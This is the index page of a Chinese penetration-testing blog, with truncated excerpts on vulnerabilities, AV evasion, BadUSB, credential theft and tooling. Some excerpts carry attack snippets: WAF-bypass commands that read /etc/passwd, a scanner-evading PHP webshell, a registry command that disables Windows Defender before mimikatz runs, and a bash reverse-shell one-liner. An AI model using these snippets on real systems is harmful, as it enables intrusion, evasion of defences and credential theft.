BaCde's Blog

登陆后的，比较鸡肋。4月份发现的，一直放着，后来看官网更新了，直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后，感兴趣的可以去看一下。简要信息版本： 5.6.13（5.6.11版本也存在问题，只需要把最后文件名字中的 - 去掉）条件：登陆后漏洞文件相关路径：/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php漏洞参数：step、start、end环境python3reques

现在许多网站都使用webpack对网站打包，许多前端框架也默认配置好webpack。这会在渗透测试或挖洞过程中带来一些麻烦。这让我们极其痛苦。但是开发者忽视起潜在风险，在线上环境使用了开发环境的配置，或者配置了sourcemap允许在生产环境中使用。这使得我们有了机会。在实际渗透过程中，许多网站还是存在这种情况。通常一般是配置了devtool: 'source-map'。我们可以在js的文件名后面加上.map，如果在这种该文件，我们则可以通过工具解压缩webpack。或者当我们一般看到类似这样.

分享几十条提取api key的正则表达式。可以借助burp、Mitmproxy，goproxy等来实现敏感信息的发现。在实际使用过程中，因为有部分规则是有转义的，在整合进工具的时候需要检查下，修正后使用即可。也欢迎大家回复本文补充新的～```bash"aliyun_oss_url": "[\\w-.]\\.oss.aliyuncs.com" "azure_storage": "https?...

临时邮箱，方便在一些网站隐藏自己身份信息，也可以在安全测试的使用。推荐使用的：https://t.odmail.cnhttps://www.mohmal.comhttp://od.obagg.comhttp://onedrive.readmail.nethttp://xkx.me其它https://www.guerrillamail.com/https://10minutemai...

Badusb 已经出现了很多年，使用usb进行攻击的手段也从最初的利用autorun.inf、伪造文件夹名、快捷方式等手段转为更加难以防御的Badusb。这种攻击方式就是目前可绕过杀毒软件，防御较难。点此打开观看一段演示视频，需fq。利用场景说下本文中利用场景：混入企业内部，员工电脑未锁屏的情况下。在之前去过很多客户那里，大多数企业的员工离开电脑前不锁屏的情况,而且非常严重。对于无安全...

CyberChef是一个很好很强大的程序。在实际中很实用。由于官方发布的线上地址使用了google统计，为了安全，还是自己搭建或者本地使用。本地就仅限于自己的电脑才可使用。所以搭建自己线上的可以随时使用，方便许多。同时配合Open in CyberChef这个浏览器插件就更加方便。直接下载官方生成的包，下载地址：https://github.com/gchq/CyberChef/release...

CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机，Windows10专业版1903测试成功.使用方法：安装impacket库git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpython setup.py install直接使用pip安装的不行，所以clone最新版本的，然...

在一些漏洞利用场景，或者因为waf等原因，导致无法使用空格时，可以试试如下命令：IFS=,;`cat<<<cat,/etc/passwd` cat$IFS/etc/passwd cat${IFS}/etc/passwd cat</etc/passwd {cat,/etc/passwd} X=$'cat\x20/etc/passwd'&&$X经...

目录漏洞原理检测与利用目标发现与寻找漏洞检测利用方式修复建议参考链接Apache Shiro是一个Java安全框架，执行身份验证、授权、密码和会话管理。2016年，网络中曝光1.2.4以前的版本存在反序列化漏洞。尽管该漏洞已经曝光几年，但是在实战中仍然比较实用。花了点时间研究了下，并根据网络上的利用脚本改进。主要修改了检测方式，并使利用方式更加简单灵活，使其更具有实战意义，提升其效率。漏洞原理...

BIGip是对负载均衡的实现，主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent（会话保持）实现。BIGip在实现会话保持机制时会在用户首次发起请求时，会为用户设置一个cookie，即服务端会添加set-cookie响应头头（比如：Set-Cookie: BIGipServerFinanceAndAdminWebfo.unc.edu=105...

Golang实现的x86下的Meterpreter reverse tcp。地址：https://github.com/insightglacier/go_meterpreter做静态免杀实验，代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。使用方法修改go_meterpreter.go中125行代码 s := “http://...

去年分析D盾的查杀规律弄的绕过。查杀效果：具体请看代码：<?phpfunction cc(){ global $b; $a =$_GET[$b]; //此处可改成POST方式 $str =$a; return $str;}?><?php$b="url";$c=cc();$aa = $c;include($aa);传入...

在windows环境中，获取系统密码，提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。简介FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片，这样显得更加真实，成功率也会更高。另外，该程序会对输入的密码进行Active Direc...

临时禁止Windows DefenderREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpupdate /force下载mimikatz后解压缩。powershell.exe -NoP -NonI -Ex...

一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。首先来简单说一下这个漏洞，该漏洞就是在Jira 8.4.0以前的版本，攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址：Jira 8.3.4 - Information Disclo...

有的时候我们会遇到一些特别难理解的shell命令，或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。网站主页打开后就是一个输入框。输入命令后，就会给出解析的结果。结果包含了解析的结果，并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例（如下图），很酷～该网站...

时代在发展，技术在进步。没有什么是停止不前的！2019年已经接近尾声，Python2停止更新的时间越来越近。其中比较流行的如 NumPy、Requests 和 TensorFlow 等承诺到 2020 年将停止支持2.x。尽管迁移过程也会花许多时间与精力，但是转Python3是早晚都要面对的。最近在迁移自己的代码到Python3，对于迁移的过程中遇到的情况进行总结。首先我们来说一下常用的prin...